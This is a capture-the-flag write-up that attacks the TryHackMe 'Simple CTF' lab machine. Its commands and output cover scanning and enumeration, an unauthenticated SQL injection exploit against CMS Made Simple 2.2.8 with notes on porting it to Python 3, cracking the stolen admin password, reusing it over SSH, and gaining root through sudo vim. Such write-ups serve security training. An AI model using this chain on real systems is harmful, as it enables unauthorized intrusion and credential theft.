Simple CTF is, as described, a simple CTF; by TryHackMe.
kali@kali:~/Desktop/TryHackMe$ nmap target.thm -A
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-15 14:10 EDT
Nmap scan report for target.thm (target.thm)
Host is up (0.019s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.11.8.219
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 2 disallowed entries
|_/ /openemr-5_0_1_3
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 29:42:69:14:9e:ca:d9:17:98:8c:27:72:3a:cd:a9:23 (RSA)
| 256 9b:d1:65:07:51:08:00:61:98:de:95:ed:3a:e3:81:1c (ECDSA)
|_ 256 12:65:1b:61:cf:4d:e5:75:fe:f4:e8:d4:6e:10:2a:f6 (ED25519)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 42.31 seconds
The question was a little badly written, especially if factoring in the previous question.
kali@kali:~/Desktop/TryHackMe$ nmap target.thm -A
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-15 14:10 EDT
Nmap scan report for target.thm (target.thm)
Host is up (0.019s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.11.8.219
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 2 disallowed entries
|_/ /openemr-5_0_1_3
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 29:42:69:14:9e:ca:d9:17:98:8c:27:72:3a:cd:a9:23 (RSA)
| 256 9b:d1:65:07:51:08:00:61:98:de:95:ed:3a:e3:81:1c (ECDSA)
|_ 256 12:65:1b:61:cf:4d:e5:75:fe:f4:e8:d4:6e:10:2a:f6 (ED25519)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 42.31 seconds
From previous scans, look into versioned services.
- vsftpd 3.0.3
- openemr-5_0_1_3
- Apache httpd 2.4.18
Before seeking out a CVE, lets dive in further.
By browsing to the host, we see a default apache page; from here, browsed to http://target.thm/robots.txt
Notably, we find text the hints towards a potential CVE on 2003-03-19, the server being CUPS, and we also see a potential username mike. And a mention of openemr-5_0_1_3.
# "$Id: robots.txt 3494 2003-03-19 15:37:44Z mike $"
#
# This file tells search engines not to index your CUPS server.
Although the robots.txt file lent us some information on what may be exploitable; I took the chance to run a directory enumeration scan with gobuster, to see if I could find anything of interest hidden away that may not have been considered.
kali@kali:~$ gobuster dir --url http://target.thm/ -w /usr/share/seclists/Discovery/Web-Content/common.tx
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://target.thm/
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/09/15 14:42:53 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/index.html (Status: 200)
/robots.txt (Status: 200)
/server-status (Status: 403)
/simple (Status: 301)
===============================================================
2020/09/15 14:43:02 Finished
===============================================================
And notably, /simple stood out as something I'd not yet considered.
/simple has a CMS hosted, with the following version information:
© Copyright 2004 - 2020 - CMS Made Simple
This site is powered by CMS Made Simple version 2.2.8
I decided to further enumerate this CMS:
kali@kali:~$ gobuster dir --url http://target.thm/simple -w /usr/share/seclists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://target.thm/simple
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/09/15 14:46:13 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/admin (Status: 301)
/assets (Status: 301)
/doc (Status: 301)
/index.php (Status: 200)
/lib (Status: 301)
/modules (Status: 301)
/tmp (Status: 301)
/uploads (Status: 301)
===============================================================
2020/09/15 14:46:23 Finished
===============================================================
And pulled out a few more directories of potential interest and few more point of potential access.
Lets search for an exploit with searchsploit
kali@kali:~$ searchsploit cms made simple
----------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------- ---------------------------------
CMS Made Simple (CMSMS) Showtime2 - File Upload Remote Code Execution | php/remote/46627.rb
CMS Made Simple 0.10 - 'index.php' Cross-Site Scripting | php/webapps/26298.txt
CMS Made Simple 0.10 - 'Lang.php' Remote File Inclusion | php/webapps/26217.html
CMS Made Simple 1.0.2 - 'SearchInput' Cross-Site Scripting | php/webapps/29272.txt
CMS Made Simple 1.0.5 - 'Stylesheet.php' SQL Injection | php/webapps/29941.txt
CMS Made Simple 1.11.10 - Multiple Cross-Site Scripting Vulnerabilitie | php/webapps/32668.txt
CMS Made Simple 1.11.9 - Multiple Vulnerabilities | php/webapps/43889.txt
CMS Made Simple 1.2 - Remote Code Execution | php/webapps/4442.txt
CMS Made Simple 1.2.2 Module TinyMCE - SQL Injection | php/webapps/4810.txt
CMS Made Simple 1.2.4 Module FileManager - Arbitrary File Upload | php/webapps/5600.php
CMS Made Simple 1.4.1 - Local File Inclusion | php/webapps/7285.txt
CMS Made Simple 1.6.2 - Local File Disclosure | php/webapps/9407.txt
CMS Made Simple 1.6.6 - Local File Inclusion / Cross-Site Scripting | php/webapps/33643.txt
CMS Made Simple 1.6.6 - Multiple Vulnerabilities | php/webapps/11424.txt
CMS Made Simple 1.7 - Cross-Site Request Forgery | php/webapps/12009.html
CMS Made Simple 1.8 - 'default_cms_lang' Local File Inclusion | php/webapps/34299.py
CMS Made Simple 1.x - Cross-Site Scripting / Cross-Site Request Forger | php/webapps/34068.html
CMS Made Simple 2.1.6 - Multiple Vulnerabilities | php/webapps/41997.txt
CMS Made Simple 2.1.6 - Remote Code Execution | php/webapps/44192.txt
CMS Made Simple 2.2.14 - Arbitrary File Upload (Authenticated) | php/webapps/48779.py
CMS Made Simple 2.2.14 - Authenticated Arbitrary File Upload | php/webapps/48742.txt
CMS Made Simple 2.2.5 - (Authenticated) Remote Code Execution | php/webapps/44976.py
CMS Made Simple 2.2.7 - (Authenticated) Remote Code Execution | php/webapps/45793.py
CMS Made Simple < 1.12.1 / < 2.1.3 - Web Server Cache Poisoning | php/webapps/39760.txt
CMS Made Simple < 2.2.10 - SQL Injection | php/webapps/46635.py
CMS Made Simple Module Antz Toolkit 1.02 - Arbitrary File Upload | php/webapps/34300.py
CMS Made Simple Module Download Manager 1.4.1 - Arbitrary File Upload | php/webapps/34298.py
CMS Made Simple Showtime2 Module 3.6.2 - (Authenticated) Arbitrary Fil | php/webapps/46546.py
----------------------------------------------------------------------- ---------------------------------
There're a few options here. But the most interesting to me is CMS Made Simple < 2.2.10 - SQL Injection | php/webapps/46635.py as previous exploits may have been patched. Remeber, the current version on /simple is 2.2.8 as we pulled earlier.
Lets open up the exploit, and hopefully pull the CVE.
GNU nano 5.2 /usr/share/exploitdb/exploits/php/webapps/46635.py
#!/usr/bin/env python
# Exploit Title: Unauthenticated SQL Injection on CMS Made Simple <= 2.2.9
# Date: 30-03-2019
# Exploit Author: Daniele Scanu @ Certimeter Group
# Vendor Homepage: https://www.cmsmadesimple.org/
# Software Link: https://www.cmsmadesimple.org/downloads/cmsms/
# Version: <= 2.2.9
# Tested on: Ubuntu 18.04 LTS
# CVE : CVE-2019-9053
import requests
from termcolor import colored
import time
from termcolor import cprint
import optparse
import hashlib
And in the header section we get the info we're intersted in.
If it wasn't already apparent from the previous step, this is an SQLi(SQL injection) exploit.
If we're going to get the password, we'll need to start using the exploit.
After reading the code, and determining it's relative safety, it details the following options as being used:
parser = optparse.OptionParser()
parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri (ex. http://10.10.10.100/cms)")
parser.add_option('-w', '--wordlist', action="store", dest="wordlist", help="Wordlist for crack admin password")
parser.add_option('-c', '--crack', action="store_true", dest="cracking", help="Crack password with wordlist", default=False)
Therefore, we need to add flags when we run it. However, before getting into that...
I copied the exploit to another directory, because it's oudated and doesn't work with Python 3.
To fix it:
- find all the
printstatements and ensure that the script usesprint(something)instead ofprint something. - ensure the
crack_passwordfunction usesstr(salt + line).encode()not justsalt + linein thehashlib.md5call.
If you're interested, I've shared the updated Python exploit script for this task.
The script pulled the following data:
[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: [email protected]
[+] Password found: 0c01f4468bd75d7a84c7eb73846e8d96
[+] Password cracked: secret
And exposes the password that we're looking for.
The stolen & cracked credentials allow us the access the admin portal; but we're looking for a 3 digit directory to solve the flag.
Let's assume that mitch uses their passed secret on other services. We already know what there's both an ssh and an ftp server.
Let's test them.
FTP does not allow us to login. Namely because it only accepts Anonymous login. Which, while interesting, isn't enough for me to dive deeper. For now.
It's important to note that in the earlier nmap scan. The ssh service is running on port 2222. This port is not default, and as such requires you to specify the port in your ssh connect.
kali@kali:~/Desktop/TryHackMe/simple-ctf$ ssh [email protected] -p 2222
The authenticity of host '[target.thm]:2222 ([target.thm]:2222)' can't be established.
ECDSA key fingerprint is SHA256:Fce5J4GBLgx1+iaSMBjO+NFKOjZvL5LOVF5/jc0kwt8.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[target.thm]:2222,[target.thm]:2222' (ECDSA) to the list of known hosts.
[email protected]'s password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-58-generic i686)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
0 packages can be updated.
0 updates are security updates.
Last login: Mon Aug 19 18:13:41 2019 from 192.168.0.190
$ whoami
mitch
The ssh connect works, with the password we procured earlier, and we have shell as mitch.
Now that we've got shell, we can search for a user flag.
$ ls -lah
total 36K
drwxr-x--- 3 mitch mitch 4,0K aug 19 2019 .
drwxr-xr-x 4 root root 4,0K aug 17 2019 ..
-rw------- 1 mitch mitch 178 aug 17 2019 .bash_history
-rw-r--r-- 1 mitch mitch 220 sep 1 2015 .bash_logout
-rw-r--r-- 1 mitch mitch 3,7K sep 1 2015 .bashrc
drwx------ 2 mitch mitch 4,0K aug 19 2019 .cache
-rw-r--r-- 1 mitch mitch 655 mai 16 2017 .profile
-rw-rw-r-- 1 mitch mitch 19 aug 17 2019 user.txt
-rw------- 1 mitch mitch 515 aug 17 2019 .viminfo
$ cat user.txt
G00d j0b, keep up!
Lets dig in deep, and see what other users are on the system.
$ cd /home; ls
mitch sunbath
Next we need to look for a priviledge escalation vector. Lets start with a sudo -l and see what we can run as sudo(root).
$ sudo -l
User mitch may run the following commands on Machine:
(root) NOPASSWD: /usr/bin/vim
Now we've found our escalation vector let's exploit it; then navigate to the /root directory in search for the root flag.
$ sudo vim
While in the Vim editor, spawn a shell with command: !sh
# whoami
root
# cd /root; ls -lah
total 28K
drwx------ 4 root root 4,0K aug 17 2019 .
drwxr-xr-x 23 root root 4,0K aug 19 2019 ..
-rw-r--r-- 1 root root 3,1K oct 22 2015 .bashrc
drwx------ 2 root root 4,0K aug 17 2019 .cache
drwxr-xr-x 2 root root 4,0K aug 17 2019 .nano
-rw-r--r-- 1 root root 148 aug 17 2015 .profile
-rw-r--r-- 1 root root 24 aug 17 2019 root.txt
# cat root.txt